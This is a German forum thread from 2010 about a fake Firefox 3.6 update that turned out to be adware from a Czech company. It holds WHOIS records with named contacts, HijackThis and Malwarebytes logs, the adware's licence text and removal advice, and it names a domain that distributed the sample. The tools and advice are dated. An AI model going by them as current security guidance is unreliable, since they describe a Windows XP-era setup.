Firefox Sicherheitsupdate 3.6- Fake

ausy

Hallo,

mein Sohne ist auf ein Sicherheitsupdate-Fake ( Firefox_3.6_update.exe ) hereingefallen und hat es installiert.
Beim aufrufen einer über Google verlinkten, an sich seriösen Adresse erscheint ein PopUp:

h**p://http://www.cjd-ewe-oldenburg.de

Leider kann ich nicht herausfinden was dieses Fake anstellt, vermutlich Trojaner? :grr:
Beim Virusscan wird nichts angezeigt.
Kennt es jemand, bzw. kann man feststellen was es anrichtet?

Edit Road-Runner: Link unklickbar gemacht, da auf der verlinkten Seite ein Script von der Seite updates-browser.c*m eingebaut ist, welches ohne NoScript dann wahrscheinlich dieses Popup hervorbringt.

Boersenfeger

Willkommen im Forum!
Dein Sohnemann hat dieses Fake-UpDate mit Adminrechten installiert?

1. Führe bitte mit Admin-Rechten HiJackThis 2.0.4 aus, damit wir mehr über dein System wissen.
Download über:
http://free.antivirus.com/hijackthis/
Kurzanleitung
Den Inhalt der Log.-Datei hier in einem neuen Beitrag der Klammer Code (das kleine Bild am Ende des Beitrags machts deutlich) einfügen und auf http://hijackthis.de/ selbst schon auswerten.

2. Durchsuche deinen Computer auch mit Malwarebytes.
Runterladen, installieren und zunächst ein UpDate der Erkennungsregeln machen. Mache einen Fullscan und lasse eine Log-Datei erstellen. Füge die Inhalte mit Klammer Code ein.[Blockierte Grafik: http://i51.tinypic.com/16i8ljb.jpg]

3. Wird etwas gefunden, freunde dich mit dem Gedanken an, das System neu aufzusetzen. (alternativ ein Image nutzen)
Lies diesen Artikel, besonders ab Punkt 4.
Ein befallenes System kann man nicht säubern

4. Sichere vorher deine persönlichen Daten.

5. Ändere alle Passwörter und beobachte deine Konten: Online-Banking, Ebay, Paypal etc.etc.

ausy

o.k. vielen Dank zunächst, er hatte die Admin-Rechte wegen dem Firefox-Update genutzt. Dummerweise sind auch eine Menge Passwörter, Ebay etc. im Firefox gespeichert. Es sah ja auch ziemlich echt aus, ich wäre wahrscheinlich selbst darauf hereingefallen.

ausy

Hallo,

Ergänzung zum Vortext:

die Datei, FAKE: Firefox_3.6_update.exe, ca. 54kb wurde definitiv mit Admin-Rights installiert, danach startete Firefox etwas verändert, d. h. die User Einstellungen waren nicht vorhanden. Ein erneutes Starten über den Link brachte jedoch alles wieder unverändert im alten Zustand. Es stellt sich die Frage was dieser Fake anstellte? Beim Googeln stellt man fest, dass diese Datei im www so ziemlich Verbreitung findet, jedoch habe ich keine Infos über die Folgen gefunden, bzw. wie man es wieder säubern kann. Die Datei erscheint unter einer deutschen (.de) Domain. Somit kommt man an die Daten der Domaininhaber.
Die betroffene Domain unter welcher der Firefox Fake zu finden ist:

Code

Domainabfrage-Ergebnis
Domaindaten
Domain 	cjd-ewe-oldenburg.de
Letzte Aktualisierung 	25.11.2010
Domaininhaber


Der Domaininhaber ist der Vertragspartner der DENIC und damit der an der Domain materiell Berechtigte.
Domaininhaber: 	Consumer Benefit
Adresse: 	Limited
Pecerady 119
PLZ: 	25741
Ort: 	Tynec nad Sazavou
Land: 	CZ
Administrativer Ansprechpartner


Der administrative Ansprechpartner (admin-c) ist die vom Domaininhaber benannte natürliche Person, die als sein Bevollmächtigter berechtigt und gegenüber DENIC auch verpflichtet ist, sämtliche die Domain cjd-ewe-oldenburg.de betreffenden Angelegenheiten verbindlich zu entscheiden.
Name: 	Christian Flegel
Adresse: 	Marktplatz 36
PLZ: 	68723
Ort: 	Oftersheim
Land: 	DE
Technischer Ansprechpartner


Der technische Ansprechpartner (tech-c) betreut die Domain cjd-ewe-oldenburg.de in technischer Hinsicht.
Name: 	Andreas Wegener
Organisation: 	Domport GmbH & Co KG
Adresse: 	Markt 32
PLZ: 	18273
Ort: 	Güstrow
Land: 	DE
Telefon: 	+49.9001118840
Telefax: 	+49.9001118860
E-Mail: 	info@domport.de
Bemerkungen: 	Information:http://www.domport.de
Questions:mailto:info@domport.de
Tel.: 09001-118840 (Verbindungskosten 1,49
Euro pro Minute aus dem Festnetz der Deutschen Telekom)
Zonenverwalter


Der Zonenverwalter (zone-c) betreut die Nameserver der Domain cjd-ewe-oldenburg.de.
Name: 	Andreas Wegener
Organisation: 	Domport GmbH & Co KG
Adresse: 	Markt 32
PLZ: 	18273
Ort: 	Güstrow
Land: 	DE
Telefon: 	+49.9001118840
Telefax: 	+49.9001118860
E-Mail: 	info@domport.de
Bemerkungen: 	Information:http://www.domport.de
Questions:mailto:info@domport.de
Tel.: 09001-118840 (Verbindungskosten 1,49
Euro pro Minute aus dem Festnetz der Deutschen Telekom)

Alles anzeigen

Ein sofortiger Gesamtscan mit GData InternetSecurity brachte nichts zu Tage. HijackThis zeigte bei der Auswertung auch nichts Verdächtiges.
Es könnte sein, dass der Fake lediglich den Firefox Inhalt verändert hatte? Deshalb habe ich Firefox komplett deinstalliert, einschl. Profiles und wieder neu installiert.

Danach erfolgte die Installation von Malewarebytes und nochmals HiJackThis, hier die Logs:

Malewarebytes:

Code

Malwarebytes' Anti-Malware 1.50
www.malwarebytes.org


Datenbank Version: 5233


Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702


02.12.2010 14:40:23
mbam-log-2010-12-02 (14-40-23).txt


Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|)
Durchsuchte Objekte: 238943
Laufzeit: 49 Minute(n), 58 Sekunde(n)


Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0


Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)


Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)


Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)


Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)


Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)


Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)


Infizierte Dateien:
(Keine bösartigen Objekte gefunden)

Alles anzeigen

HiJackThis:

Code

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 14:41:34, on 02.12.2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal


Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Gemeinsame Dateien\G DATA\GDScan\GDScan.exe
D:\Safety\GData\AVK\AVKWCtl.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Intel\WiFi\bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Gemeinsame Dateien\G DATA\AVKProxy\AVKProxy.exe
D:\Safety\GData\AVK\AVKService.exe
D:\Safety\GnuPG\dirmngr.exe
C:\Programme\Intel\WiFi\bin\EvtEng.exe
C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\RegSrvc.exe
C:\Programme\Compal Electronics, INC\Smart Watchdog\SWDsvc.exe
C:\WINDOWS\system32\svchost.exe
D:\Safety\GData\Firewall\GDFwSvc.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Motorola\SMSERIAL\sm56hlpr.exe
C:\Programme\Compal\Wow Video&Audio\WVAMain.exe
 C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\iFrmewrk.exe
C:\Programme\Elantech\ETDCtrl.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Programme\Intel\WiFi\bin\ZCfgSvc.exe
C:\WINDOWS\vsnp2uvc.exe
C:\Programme\Wireless Select Switch\WLSS.exe
C:\Programme\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe
D:\Safety\GData\AVKTray\AVKTray.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
D:\Safety\GData\Firewall\GDFirewallTray.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\WIDCOMM\Bluetooth Software\BTTray.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\NOTEPAD.EXE
G:\HijackThis.exe


R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: G Data WebFilter Class - {0124123D-61B4-456f-AF86-78C53A0790C5} - D:\Safety\GData\WebFilter\AvkWebIE.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: G Data WebFilter - {0124123D-61B4-456f-AF86-78C53A0790C5} - D:\Safety\GData\WebFilter\AvkWebIE.dll
O4 - HKLM\..\Run: [SMSERIAL] C:\Programme\Motorola\SMSERIAL\sm56hlpr.exe
O4 - HKLM\..\Run: [Wow Video&Audio] C:\Programme\Compal\Wow Video&Audio\WVAMain.exe
O4 - HKLM\..\Run: [Acronis Scheduler2 Service] "C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedhlp.exe"
O4 - HKLM\..\Run: [IntelWireless] "C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel Wireless Tray
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [ETDWare] C:\Programme\Elantech\ETDCtrl.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Programme\Intel\WiFi\bin\ZCfgSvc.exe"
O4 - HKLM\..\Run: [snp2uvc] C:\WINDOWS\vsnp2uvc.exe
O4 - HKLM\..\Run: [WLSS] C:\Programme\Wireless Select Switch\WLSS.exe
O4 - HKLM\..\Run: [IJNetworkScanUtility] C:\Programme\Canon\Canon IJ Network Scan Utility\CNMNSUT.exe
O4 - HKLM\..\Run: [CanonMyPrinter] C:\Programme\Canon\MyPrinter\BJMyPrt.exe /logon
O4 - HKLM\..\Run: [G Data AntiVirus Tray Application] D:\Safety\GData\AVKTray\AVKTray.exe
O4 - HKLM\..\Run: [GDFirewallTray] D:\Safety\GData\Firewall\GDFirewallTray.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "D:\Tools\AcrobatReader\Reader\Reader_sl.exe"
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] D:\Safety\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: BTTray.lnk = ?
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://D:\Tools\Office\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Senden an &Bluetooth-Gerät... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~2\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~2\INetRepl.dll
O9 - Extra 'Tools' menuitem: Mobilen Favoriten erstellen... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~2\INetRepl.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\Tools\Office\OFFICE11\REFIEBAR.DLL
O9 - Extra button: iFinger - {936E5D60-596C-11D3-BB96-00600816DF55} - C:\WINDOWS\system32\SHDOCVW.DLL
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1263318776140
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A5AC9B0-4E81-470A-84BD-513CA4D3609E}: NameServer = 212.6.108.140,212.6.108.141,212.6.54.161,212.6.64.162,192.168.178.1
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Acronis Nonstop Backup service (afcdpsrv) - Acronis - C:\Programme\Gemeinsame Dateien\Acronis\CDP\afcdpsrv.exe
O23 - Service: G Data AntiVirus Proxy (AVKProxy) - G Data Software AG - C:\Programme\Gemeinsame Dateien\G DATA\AVKProxy\AVKProxy.exe
O23 - Service: G Data Scheduler (AVKService) - G Data Software AG - D:\Safety\GData\AVK\AVKService.exe
O23 - Service: G Data Dateisystem Wächter (AVKWCtl) - Unknown owner - D:\Safety\GData\AVK\AVKWCtl.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: DirMngr - Unknown owner - D:\Safety\GnuPG\dirmngr.exe
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel(R) Corporation - C:\Programme\Intel\WiFi\bin\EvtEng.exe
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Programme\Gemeinsame Dateien\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: G Data Personal Firewall (GDFwSvc) - G Data Software AG - D:\Safety\GData\Firewall\GDFwSvc.exe
O23 - Service: G Data Scanner (GDScan) - G Data Software AG - C:\Programme\Gemeinsame Dateien\G DATA\GDScan\GDScan.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Programme\Google\Update\GoogleUpdate.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Programme\Java\jre6\bin\jqs.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel(R) Corporation - C:\Programme\Gemeinsame Dateien\Intel\WirelessCommon\RegSrvc.exe
O23 - Service: Intel(R) PROSet/Wireless WiFi Service (S24EventMonitor) - Intel(R) Corporation - C:\Programme\Intel\WiFi\bin\S24EvMon.exe
O23 - Service: Smart Watchdog Service (Smart Watchdog) - Unknown owner - C:\Programme\Compal Electronics, INC\Smart Watchdog\SWDsvc.exe
--
End of file - 9430 bytes

Alles anzeigen

Vielleicht hat jemand die Möglichkeit den Fake in einer Sandbox laufen zu lassen, um zu sehen was sich da tut. Leider habe ich damit keine Erfahrungen. Die Datei befindet sich im folgenden Anhang:

Edit Road-Runner: Dateianhang entfernt, da die betreffende Datei als Malware eingestuft wurde (siehe hier)

Boersenfeger

Zitat

Pecerady 119
PLZ: 25741
Ort: Tynec nad Sazavou
Land: CZ

Týnec nad Sázavou
Das liegt heute definitiv nicht mehr in Deutschland....
Abgesehen davon, das du neben GData auch den Spyware Doctor installiert hast, einige Programme nicht standardpfadmäßig installiert hast, sehe ich nichts wesentliches. Was nichts heißen soll! Wenn Spyware Doctor zeitgleich mit GData Inhalte scannt, könnte es zu Problemen kommen. Ich kenne beide Programme nicht!
Beschere deinem Sohnemann ein eingeschränktes Windows Benutzerkonto, damit er solche Sperenzien, mit möglicherweise übleren Folgen, nicht nochmal machen kann.
BTW: Wie man Firefox richtig aktualisiert, kannst du in diesem Artikel nachlesen.

Brummelchen

Auch wenn in den Logs nichts Verdächtiges steht, mir persönlich wäre das
alles viel zu heikel und hätte ein Image benutzt...!

PvW

Abends!

In der *exe verbirgt sich folgende Struktur :
[attachment=1]AV-Strukt.png[/attachment]

Weder die *zip.noch die *exe sind lokal (zunächst!) bemängelt worden,auch Virustotal zeigte sich zurückhaltend (4/43).
Der Spielverderber ist die folgende Datei,die Avast 5 sofort gepackt hat:
[attachment=0]Avast5-SM948_2118.png[/attachment]
Dazu finden die Scanner schon ergeblich mehr (34/43 :
Virustotal.com : SM_948_2118

Detail am Rande :
Beim Ausführen der *exe wird zunächst diese "Vereinbarung" gezeigt:

Code

SOFTWARELIZENZVERTRAG 




Widerrufsbelehrung


Allgemeines:


Verbraucher i.S.d. Geschäftsbedingungen sind natürliche Personen, mit denen in Geschäftsbeziehungen getreten wird, ohne dass diesen eine gewerbliche oder selbständige berufliche Tätigkeit zugerechnet werden kann. Unternehmer i.S.d. Geschäftsbedingungen sind natürliche oder juristische Personen oder rechtsfähige Personengesellschaften, mit denen in Geschäftsbeziehungen getreten wird, die in Ausübung einer gewerblichen oder selbständigen beruflichen Tätigkeit handeln. Kunde i.S.d. Geschäftsbedingungen sind sowohl Verbraucher als auch Unternehmer. 


Widerrufsrecht bei Fernabsatzverträgen (BGB § 312d):


Dem Verbraucher (BGB § 13) steht bei Fernabsatzverträgen (BGB § 312b) ein Widerrufsrecht (BGB § 355) zu. Nach Maßgabe des Gesetzes hat er innerhalb von zwei Wochen nach Erhalt der Ware die Möglichkeit, den Vertrag ohne Begründung zu widerrufen. Der Widerruf wird schriftlich gestellt; zur Fristwahrung genügt die rechtzeitige Absendung an: Consumer Benefit LTD, Pecerady 119, Okr. benesov, cz - 25741 Tynec nad sazavou




Das Widerrufsrecht erlischt wenn der Unternehmer mit der Ausführung der Dienstleistung mit ausdrücklicher Zustimmung des Verbrauchers vor Ende der Widerrufsfrist begonnen hat oder der Verbraucher diese selbst veranlasst hat, also z.B. durch download von Software.


§ 01. Allgemeine Bedingungen:


Die nachfolgenden Bestimmungen regeln die vertraglichen Beziehungen zwischen der Consumer Benefit Ltd. und deren Kunden. Sie gelten für die von der Consumer Benefit Ltd. erbrachten Dienstleistungen im Rahmen des Angebotes der Consumer Benefit Ltd. und enthalten auch eine Reihe von Hinweisen zum Umgang mit der von uns vertriebenen Software. 


§ 02. Umfang und Leistung:


Die Leistung der Software hat das Ziel, dem Kunden ein auf seine individuellen Bedürfnisse und Interessen zugeschnittenes Surf - Erlebnis zu gewährleisten unter Nutzung der technischen Ressourcen des Kunden.  


Die Dienstleistungen der Consumer Benefit Ltd. beinhalten die Benutzung einer Software der Consumer Benefit Ltd. Der Kunde erhält also eine einfache Nutzungslizenz. Die Software, die Grafiken oder sonstigen Daten dürfen nicht ohne die Zustimmung der Consumer Benefit Ltd. vervielfältigt und/oder verbreitet, analysiert, dekompiliert und verändert werden. Dies stellt einen Eingriff in unsere Rechte dar. Durch die Installation der Software können weitere Kosten Dritter entstehen. Soweit Verträge im weiteren Verlauf des Zugangs des Kunden auf Seiten Dritter abgeschlossen werden, kommen diese Verträge mit dem Kunden und den Dritten zustande.


§ 03. Vertragsgegenstand:


 Der Kunde erhält unentgeltlich eine einfache Lizenz an einer Werbesoftware. Als Gegenleistung kooperiert der Kunde mit der Consumer Benefit Ltd. im Bereich des Marketings und ist mit der Installation der Consumer Benefit Ltd. Werbesoftware einverstanden. Der Kunde wird darauf hingewiesen, dass bei Aktivierung der Consumer Benefit Ltd. Werbesoftware eine Reihe von Änderungen am PC des Kunden vorgenommen werden können, mit dem Ziel dem Kunden ein auf seine individuellen Bedürfnisse und Interessen zugeschnittenes Surf - Erlebnis zu gewährleisten unter Nutzung der technischen Ressourcen des Kunden.  


Sie müssen dem Anbieter dieser Software keine personenbezogenen Daten zur Verfügung stellen, um die Software  herunterladen und nutzen zu können. Es können alle Funktionen der Software verwendet werden, ohne dass die personenbezogenen Daten des Anwenders  übermittelt werden müssen. Es ist jedoch möglich, dass Informationen, die normalerweise keine personenbezogenen Daten enthalten - wie beispielsweise Suchanfragen oder Webseitenadressen - trotzdem solche Informationen aufweisen. Jedes Mal, wenn Sie die Software verwenden, z. B. wenn Sie eine Suchanfrage in einer Suchmaschine  eingeben, sendet die Software standardmäßige, eingeschränkte Informationen, einschließlich der IP- Adresse Ihres Computers sowie ein oder mehrere Cookies. Diese Daten werden in den Serverprotokollen der Software gespeichert. Wenn Sie in einer Suchmaschine eine URL oder einen Suchbegriff eingeben, wird diese Information möglicherweise an den Betreiber gesendet, damit dieser Ihnen dabei helfen kann, ein optimiertes Suchergebnis zu finden. Nahezu alle Versionen der Software besitzen eine oder mehrere eindeutige Anwendungsnummern. Die Vergabe dieser eindeutigen Anwendungsnummer ist für die Software zwingend erforderlich und kann nicht deaktiviert werden. Bei der Installation der Software, werden diese Nummern an den  Betreiber gesendet. Außerdem wird eine Nachricht gesendet, in der angegeben wird, ob der Vorgang erfolgreich war oder fehlgeschlagen ist. Zusätzlich dazu kontaktiert die Software regelmäßig die  Server des Betreibers, um abzufragen, ob automatische Aktualisierungen vorhanden sind. Dabei werden ebenfalls die eindeutigen Anwendungsnummern, sowie optional die Nutzungs- und Konfigurationsstatistiken der Software gesendet. Bei der Verwendung bestimmter optionaler Funktionen der Software werden die Adressen oder andere Informationen über die von Ihnen besuchten Websites an die Software gesendet.  Funktionen, die auf Ihre Anfrage zusätzliche Informationen von der Software abfragen, senden unter Umständen ebenfalls bestimmte Daten an die Software, diese protokolliert diese Datenübermittlung. Alle von der Software übermittelten Informationen werden gemäß unseren Datenschutzbestimmungen von uns behandelt. Informationen, die Sie an Websites von Drittanbietern gesendet haben, unterliegen den Datenschutzbestimmungen von der Software jedoch nicht.


Der Kunde erklärt sein Einverständnis mit der Installation dieser Software wenn er den Installations- bzw. Zustimmungsbutton aktiviert hat. Mittels dieser Software wird eine Reihe von Daten des Kunden abgefragt und ein für den Kunden auf seine Interessen und Bedürfnisse individuell zusammengestelltes Werbeangebot erstellt. Um die Vorteile zu erlangen, die über unsere Software zur Verfügung werden, muss der Prozessor Ihres Computers und die Übertragungsbandbreite Ihres Internetanschlusses, die Werbesoftware verwenden.


Wir unternehmen angemessene Anstrengungen, um die Vertraulichkeit und Unversehrtheit Ihrer Computerressourcen und Ihrer Kommunikation zu schützen, wir können in dieser Beziehung keine Garantien und Zusicherungen leisten.


Wir können den Inhalt von Kommunikation(en), die über die Werbesoftware durch Dritte verbreitet wird, nicht kontrollieren und wir haben keinerlei Wissen darüber. Es handelt sich jeweils um fremde Inhalte. Der Inhalt dieser Kommunikation bzw. Inhalte liegt alleine in der Verantwortlichkeit der Person bzw. Unternehmen,  von der ein solcher Inhalt ausgeht. Es ist daher möglich, dass Sie Inhalten ausgesetzt werden, welche anstößig, unsittlich oder anderweitig zu beanstanden sind. Wir sind nicht haftbar für jegliche Art der Kommunikation, die über die Werbesoftware durch Dritte verbreitet wird.


Es werden keine personenbezogenen Daten des Kunden an Consumer Benefit Ltd.  übermittelt. 


Die Übermittlung der IP- Adresse sowie Zuordnungscodes und URLs erfolgt nur um das für den Kunden bereitgestellte Angebot optimal steuern zu können und ist somit rein technisch bedingt. Eine weitere Verarbeitung der IP- Adresse oder Übermittlung und Verarbeitung von Daten des Kunden erfolgt nicht, insbesondere keine Weitergabe an Dritte. 


Der Kunde wird darauf hingewiesen und stimmt mit Aktivierung der Consumer Benefit Ltd. Werbesoftware zu, dass eine Reihe von Einstellungen auf seinem Rechner verändert werden, um dem Kunden ein optimales, auf seine Bedürfnisse abgestimmtes Angebot zu erstellen. Die Übermittlung der Daten des Kunden an Consumer Benefit Ltd. erfolgen auf jeden Fall anonym. Der Kunde ist damit einverstanden, dass er zum gegebenem Zeitpunkt Updates der Consumer Benefit Ltd. Werbesoftware erhält. 


Wichtiger Hinweis: 


Wird von der Consumer Benefit Ltd.  eine neue Version der Werbesoftware den Anwendern zur Verfügung gestellt, kann von der Consumer Benefit Ltd. die Einstellung erfolgen, dass der Anwender- PC direkt vom Server die neue Version abholt. Eine neue Internetverbindung wird damit keinesfalls geöffnet.


§ 04. Vertragsannahme durch die Consumer Benefit Ltd., Dauer des Vertrages, Kündigung:


Die Consumer Benefit Ltd. GmbH kann ohne Angabe von Gründen ablehnen, mit einem Kunden ein Vertragsverhältnis einzugehen. Der Vertrag tritt mit der Zustimmung des Kunden zur Aktivierung der Software in Kraft. Das Vertragsverhältnis wird auf eine Dauer von 24 Monaten abgeschlossen. Eine Kündigung aus wichtigem Grunde ist für beide Seiten jederzeit möglich. Im Falle einer vorzeitigen Vertragsauflösung kann der Kunde eine kostenpflichtige De- Installationssoftware von der Consumer Benefit Ltd. erhalten. 


§ 05. Reklamationen und Beanstandungen:


Reklamationen und Beanstandungen aus dem Vertragsverhältnis sind unmittelbar und schriftlich durchzuführen: Consumer Benefit LTD, Pecerady 119, Okr. benesov, cz - 25741 Tynec nad sazavou




§ 06. Haftung:


Die Software und die Dienstleistungen der Consumer Benefit Ltd. werden mit Sorgfalt erstellt bzw. erbracht.  Für Schäden auf Grund von Störungen, Irrtümern, falsch übermittelten Daten, Verzögerungen, Unterbrechungen, die im Dienstbetrieb der Consumer Benefit Ltd. auftreten können, insbesondere auch auf Grund von Fehlern oder Störungen in der elektronischen Datenübertragung sowie bei Benutzung, Verwendung, Betrieb oder Reparatur von Geräten, haftet die Consumer Benefit Ltd. nur bei Vorsatz und grober Fahrlässigkeit. Diese Haftungsbeschränkung resultiert ins Besondere aus der gebotenen Schnelligkeit und der dadurch bedingten Fehlermöglichkeit. Die Consumer Benefit Ltd. liefert in erster Linie Dienstleistungen für den Privat-Kunden. Eine Haftung der Consumer Benefit Ltd. für Schäden oder Nachteile, die sich aus der geplanten Anwendung der Dienstleistungen ergeben, wird ausdrücklich ausgeschlossen. Die Höhe von Regressansprüchen - gleich welcher Art - ist auf die Höhe der bis zum Eintritt des Schadensereignisses erhaltenen Vergütung für die Consumer Benefit Ltd. begrenzt, Mangelfolgeschäden sind generell ausgeschlossen, soweit zulässig.


§ 07. Datenschutz:


Rechtsgrundlage für den Umgang mit personenbezogenen Kundendaten sowie deren Verarbeitung sind das Teledienstdatenschutzgesetz (TDDSG) und ergänzend das Bundesdatenschutzgesetz (BDSG). Der Kunde willigt ein, dass personenbezogene Kundendaten (Bestandsdaten gemäß § 5 TDDSG) zur abwicklungstechnischen Verarbeitung verwendet und elektronisch gespeichert werden. Eine Weitergabe der Kundendaten an Dritte erfolgt nicht. 


§ 08. Salvatorische Klausel:


Sollten einzelne Bestimmungen des Vertrages einschließlich dieser Regelungen ganz oder teilweise unwirksam sein oder werden, oder sollte der Vertrag eine Regelungslücke enthalten, bleibt die Wirksamkeit der übrigen Bestimmungen oder Teile solcher Bestimmungen unberührt. Anstelle der unwirksamen oder fehlenden Bestimmungen treten die jeweiligen gesetzlichen Regelungen.




Consumer Benefit Ltd.


Stand der AGB: 09/2010

Alles anzeigen

Bla.
'Ne LTD in Tschechien hat schon wat ...

Waidmannsheil!
:mrgreen:
Gruß
P.

ausy

Habe das Programm in Sandboxie mal gestartet. Es kommt zu der besagten Anzeige, anschließend versucht das Programm sofort online zu gehen. In der Sandbox verbleibt nichts. Vermute dass es einen Scan durchgeführt hat und anschließend Daten versenden wollte.
Habe die exe-Datei teilweise editiert:

Code

